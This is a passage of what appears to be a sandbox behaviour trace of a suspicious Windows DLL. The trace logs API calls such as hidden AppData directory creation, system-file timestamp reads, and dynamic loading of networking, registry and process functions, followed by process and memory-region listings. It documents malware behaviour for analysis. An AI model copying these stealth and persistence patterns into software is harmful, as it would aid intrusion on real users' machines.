(dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.981] SetLastError (dwErrCode=0x0) [0033.981] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.982] SetLastError (dwErrCode=0x0) [0033.982] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.983] GetLastError () returned 0x0 [0033.983] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.984] SetLastError (dwErrCode=0x0) [0033.984] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.985] SetLastError (dwErrCode=0x0) [0033.985] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.986] GetLastError () returned 0x0 [0033.986] SetLastError (dwErrCode=0x0) [0033.987] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.987] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.987] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.988] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf668 | out: lpSystemTimeAsFileTime=0x1cf668*(dwLowDateTime=0xe1f0fb30, dwHighDateTime=0x1d3dfba)) [0033.988] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf5a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.988] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf488, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.988] GetLastError () returned 0x0 [0033.989] GetLastError () returned 0x0 [0033.989] GetLastError () returned 0x0 [0033.989] GetLastError () returned 0x0 [0033.989] GetLastError () returned 0x0 [0033.989] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.989] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.989] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.989] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.989] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.989] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.989] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.989] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.989] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.989] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.989] GetLastError () returned 0xb7 [0033.989] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.989] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.989] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.989] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.989] wsprintfA (in: param_1=0x1cf308, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.989] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.989] wsprintfA (in: param_1=0x1cf204, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.989] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.990] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.990] CloseHandle (hObject=0x74) returned 1 [0033.990] GetLastError () returned 0x0 [0033.990] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.990] GetLastError () returned 0x0 [0033.990] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.990] GetSystemDirectoryA (in: lpBuffer=0x1cf308, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.990] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.990] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.990] CloseHandle (hObject=0x74) returned 1 [0033.990] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.990] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.990] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.992] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.992] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.992] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.992] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.992] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.992] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.992] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.992] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.992] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.992] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.992] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.993] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.994] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.994] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.994] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.994] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.994] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.994] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.994] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.994] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.994] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.994] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.994] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.994] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.995] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.995] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.995] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.995] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.995] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.995] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.995] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.995] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.995] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.995] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.995] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.998] Entry () [0033.998] GetMessageA (lpMsg=0x1cf98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 146 os_tid = 0xdcc [0036.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.548] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.548] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.548] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.548] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.548] GetCurrentThreadId () returned 0xdcc Process: id = "41" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fae0" os_pid = "0xc60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1847 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1848 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1849 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1850 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1851 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1852 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1853 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1854 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1855 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1856 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1857 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1858 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1859 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1860 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1861 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1862 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1863 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1864 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1865 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1866 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1867 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1868 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1869 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1870 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1871 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1872 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1873 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1874 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 